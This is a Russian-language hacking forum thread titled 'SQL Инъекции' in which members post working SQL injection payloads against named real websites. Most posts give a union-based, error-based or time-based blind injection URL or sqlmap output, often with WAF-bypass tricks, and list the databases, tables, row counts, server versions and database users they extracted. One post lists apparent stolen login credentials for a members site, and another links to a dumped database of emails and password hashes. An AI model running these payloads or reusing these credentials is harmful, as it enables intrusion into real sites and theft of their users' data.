SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    http://adamslove.org/en-d.php?id=85'+or+1+group+by+mid(version(),rand(0)|0)having+avg(0)%23
    MySQL error: 1062 (Duplicate entry '5.5.51-38.2' for key 'group_key')
    Где ж тут Blind? Или Вы всегда полагаетесь только на sqlmap? И да, там присутствует Mod_security, потому используем нестандартные пробелы и загоняем операторы в комментарии с версией(пример /*!12345union*/%0aselect)!
     
    SlipX, erwerr2321, palec2006 and 3 others like this.
  2. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    простите за флуд, но на кой хер выставлять ссылки на уязвимые сайты если ты элементарно не можешь эту уязвимость раскрутить?


    а теперь по теме:

    Code:
    http://www.imrs.rs/index.php?id=-67+union+select+1,2,3,4,5,database(),7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21--
     
    #162 sepo, 13 Aug 2017
    Last edited: 13 Aug 2017
    palec2006 likes this.
  3. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    target: http://www.tissueeng.net
    type: SQL Injection
    Code:
    http://www.tissueeng.net/lab/peopleDetail.php?id=-424+/*!50000union*/+/*!50000select*/+1,user(),3,4,5,version(),7--+

    user: tissueen_erikp@localhost
    version: 5.6.32-78.1-log
     
    sepo and Gorev like this.
  4. SlipX

    SlipX New Member

    Joined:
    30 Aug 2013
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    http://www.kandiusa.com/product_list.php?id=1
    Database: kandiusa
    +---------+---------+
    | Table | Entries |
    +---------+---------+
    | custom | 8877 |
    | product | 4703 |
    | orderm | 3843 |
    | parts | 597 |
    | class | 372 |
    | sort | 76 |
    | wty | 3 |
    | admn | 2 |
    | reg | 1 |
    +---------+---------+

    http://www.cambridgesilversmiths.com/browse/detail.php?id=2504
    available databases [48]:
    [*] CamSilWeb
    [*] Crystal
    [*] cs_dev_ecommSQL
    [*] cs_ecommSQL
    [*] CZOC
    [*] d2
    [*] Data_005
    [*] DATA_020
    [*] DATA_021
    [*] DATA_022
    [*] DATA_55
    [*] DATA_56
    [*] DATA_999_ARCHIVE
    [*] DATA_ARCHIVE
    [*] DataLF
    [*] DemoSynergy
    [*] distribution
    [*] EDI_2
    [*] EDI_CS_TEMP
    [*] EEDI_CS
    [*] FedEx
    [*] GENTRANDatabase
    [*] Issues
    [*] KS_Inbox
    [*] KS_Object
    [*] master
    [*] model
    [*] msdb
    [*] msllockdb
    [*] Northwind
    [*] pubs
    [*] PWE
    [*] Screens
    [*] Spanish
    [*] swWorkFlow
    [*] Synergy
    [*] TaxTables
    [*] tempdb
    [*] Ticketing
    [*] UPS
    [*] vendor_dev
    [*] vendor_test
    [*] VendorLF
    [*] vpEDI_Company
    [*] zWMS_CA
    [*] zWMS_dev
    [*] zWMS_PreMigration
    [*] zWMS_Test_NJ

    http://www.pinoy-market.com/store.php?id=136
    available databases [5]:
    [*] information_schema
    [*] mysql
    [*] ofertas
    [*] pinoy
    [*] test


    http://www.ecgi.de/wp/wp_id.php?id=213
    available databases [3]:
    [*] db1081552-ecgi1
    [*] db1081552-ecgi2
    [*] information_schema


    Http://www.kupa.pl/pl/humor.php?id=16
    available databases [1]:
    [*] baza777

    // Не надо флудить однообразными сообщениями.
    // Объединяй в 1 пост, не создавай модераторам лишней работы
    // ВВ
     
    #164 SlipX, 19 Aug 2017
    Last edited by a moderator: 19 Aug 2017
  5. SlipX

    SlipX New Member

    Joined:
    30 Aug 2013
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    tvet.ps/home.php?org=43
    available databases [2]:
    [*] information_schema
    [*] tvetps_db
     
  6. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    Code:
    http://www.pizzifarm.com/printerfriendly.php?id=-25+union+select+version()+--+
    4.1.20
     
  7. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    ЗАО НПЦ «АСПЕКТ»

    Code:
    http://aspect.dubna.ru/new/news.php?id=-222+union+select+@@version--
     
  8. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    Code:
    http://www.immobilien-bender.com/download_blob.php?ID_KATALOG_FILE=99' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a787a71,0x556a6d655550696468517a6654417a59597750744f654b7164566e64624876594f58704345774b72,0x7170706a71),NULL,NULL,NULL,NULL,NULL-- WNxl
     
  9. SlipX

    SlipX New Member

    Joined:
    30 Aug 2013
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    http://mycompaniesact.com/orders.php?id=401
    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=401' AND 5514=5514 AND 'bTax'='bTax
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=401' AND (SELECT 9875 FROM(SELECT COUNT(*),CONCAT(0x7170627871,(SELECT (ELT(9875=9875,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'niid'='niid
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=401' AND SLEEP(5) AND 'TmYG'='TmYG
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 8 columns
        Payload: id=401' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170627871,0x4975495a54675364526f6847444d55556c714d507361564a62794f486f5242756f6b65674d436f48,0x7162717a71)-- srbU
    ---
    web server operating system: Linux Ubuntu
    web application technology: Apache 2.4.7, PHP 5.5.9
    back-end DBMS: MySQL >= 5.0
    available databases [24]:
    [*] cashflow
    [*] cashflowblog
    [*] cim
    [*] complyzone
    [*] complyzoneblog
    [*] gstcomplyzone
    [*] gstseekho
    [*] gstseekhoapp
    [*] information_schema
    [*] mppcos
    [*] mycompaniesact
    [*] mycompaniesact_blog
    [*] mysql
    [*] performance_schema
    [*] permier
    [*] phpmyadmin
    [*] punitecom
    [*] rishab
    [*] sammiraman
    [*] ssluthra
    [*] trackmyinvoice
    [*] uniqueshiksha
    [*] unocalecom
    [*] Vendor_Payment_Generation
     
  10. SlipX

    SlipX New Member

    Joined:
    30 Aug 2013
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    К сожелению да, не так силен в этом незнаю с чего начать даж
    Был бы кто научит)


    http://www.sfgames.ru/gameS.php?id=232

    Code:
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
    sqlmap identified the following injection point(s) with a total of 268 HTTP(s) requests:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=232 AND 5858=5858
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=232 AND SLEEP(5)
    ---
    [18:55:32] [INFO] the back-end DBMS is MySQL
    web application technology: Nginx, PHP 5.2.17
    back-end DBMS: MySQL >= 5.0.12
     
    #170 SlipX, 6 Oct 2017
    Last edited: 6 Oct 2017
  11. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    Code:
    https://video.bbb.org/vncSearch.php?category=13 UNION ALL SELECT NULL,CONCAT(0x716a6a7671,0x644b4861496f585455585368634d4e6c55486a437768767250584955436345504149454674624f61,0x716a786b71),NULL,NULL,NULL,NULL-- ERFG&bureauId=
    available databases [3]:
    [*] bbbvideo
    [*] information_schema
    [*] test
    
     
  12. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Code:
    http://de.u7buy.com/news/news.html?date=2016-09%' AND 1010=1010 AND '%'='
    available databases [1]:
    [*] u7buy_dbs
    
     
  13. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    Code:
    http://smmmafia.com/gobig/tnsnfri/rcknrol.php?geo=US' UNION ALL SELECT NULL,CONCAT(0x717a627a71,0x6e4e5a72734174575a6f6946495a77786d4142695a6c6b5a594c647a6b6946414657426479557962,0x71767a6b71)-- hajN
    Есть идеи что за сайт и для чего он?
     
  14. SlipX

    SlipX New Member

    Joined:
    30 Aug 2013
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    http://www.vpscro.com/cn/about.php?id=166
    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=166 AND 3378=3378
    
        Type: error-based
        Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
        Payload: id=166 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171627071,(SELECT (ELT(2938=2938,1))),0x7178627071,0x78))s), 8446744073709551610, 8446744073709551610)))
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=166 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 12 columns
        Payload: id=-4940 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627071,0x794e677a4367776d4c75676a55677158705a414c684b44686c4b67546f545979546e4d636c594a53,0x7178627071),NULL,NULL,NULL,NULL,NULL-- FkYN
    ---
    web server operating system: Windows 2008 or Vista
    web application technology: ASP.NET, PHP 5.5.10, Microsoft IIS 7.0
    back-end DBMS: MySQL >= 5.5
    available databases [18]:
    [*] bugtracker
    [*] dzzoffice
    [*] eyao
    [*] hdm0130219_db
    [*] hdm0580028_db
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] pigcms
    [*] test
    [*] tsoa
    [*] ucenter
    [*] uchome
    [*] vp_phpcms
    [*] vp_xcx
    [*] vppr
    [*] wecenter
    [*] wqjk
     
  15. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Не получается вывести колонки из таблиц, у кого получится скиньте вектор в пм.
    аккаунты для входа(без них работать не будет)
    Code:
    hopkins123:hopkins1
    KlausuPirelli:pirelli1
    Vishnu24:Ackbar24
    momoneyg08:wordupho
    
    Code:
    http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+and+updatexml(NULL,concat(0x3a, ( select database()) ),Null)-- -&template_set=3
    XPATH syntax error: ':sitedepth'
    
    http://www.pacinonetworkpass.com/members/frame.php?site=lazonamodelos/content.php?show=models&id=368+ OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID(database(), 1, 63), FLOOR(RAND(0)*2)))-- -&template_set=3
    Duplicate entry 'sitedepth1' for key 'group_key'
    
    tables:
    userman
    site_settings
    users
    
     
  16. SlipX

    SlipX New Member

    Joined:
    30 Aug 2013
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    http://www.golf-in-japan.com/course.php?ID=372
    + bd mail hach username
    [HIDE]
    https://yadi.sk/i/pxTpczCR3NmKpt
    [/HIDE]

    Code:
    ---
    Parameter: ID (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: ID=372 AND 5008=5008
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: ID=372 AND (SELECT 1815 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(1815=1815,1))),0x71786b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: ID=372 AND SLEEP(5)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 32 columns
        Payload: ID=-3043 UNION ALL SELECT NULL,NULL,CONCAT(0x71766a7071,0x6f49475068796d43755072586e44506f504d575573424141775657754b625a7368574a554c6a6678,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uzrc
    ---
    web server operating system: Linux Ubuntu 16.04 (xenial)
    web application technology: Apache 2.4.18
    back-end DBMS: MySQL >= 5.0
    available databases [2]:
    [*] gij_db
    [*] information_schema
     
    #176 SlipX, 15 Oct 2017
    Last edited: 15 Oct 2017
  17. SlipX

    SlipX New Member

    Joined:
    30 Aug 2013
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    http://www.odontoprimegroup.com/about.php?id=4
    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
        Payload: id=4' OR NOT 9339=9339#
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=4' AND SLEEP(5)-- iguT
    ---
    web application technology: Apache, PHP 5.4.22
    back-end DBMS: MySQL >= 5.0.12
    available databases [2]:
    [*] information_schema
    [*] odonto_odo
    
     
  18. Dri-M

    Dri-M New Member

    Joined:
    25 Nov 2012
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    http://remiremont.fr/associations/detail.php?id=68
    Code:
    ---
    Parameter: id (GET)
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=68 OR (SELECT 8037 FROM(SELECT COUNT(*),CONCAT(0x7176627071,(SELECT (ELT(8037=8037,1))),0x71707a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: id=68 OR SLEEP(10)
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 11 columns
        Payload: id=68 UNION ALL SELECT NULL,CONCAT(0x7176627071,0x674772756c78427a446a6248755a6e67426e6c47675a546e5449546456755a7257426c534b6b7961,0x71707a7671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RzWd
    ---
    http://gloomysunday.hu/shop.php?id=9
    Code:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: id=-7104 OR 6087=6087#
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=9 AND (SELECT 5231 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(5231=5231,1))),0x71787a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: id=9 OR SLEEP(10)
    ---
     
  19. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    New Jersey State Opera
    Code:
    http://www.njstateopera.org/news.php?id=-6+union+select+1,2,version(),4,database(),6,7,user()--
     
  20. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Code:
    http://www.salut.ru/ViewTopic.php?Id=2325
    http://www.salut.aero/info.php
    view-source:http://www.salut.ru/ViewTopic.php?Id=-2325%27+union+select+1,2,3,user(),5,6,database(),version(),9,10,11,12,13,14,15,16%20--%20ccv
    | 5.1.67-0ubuntu0.10.04.1 | salut | salut@localhost
     
    sepo likes this.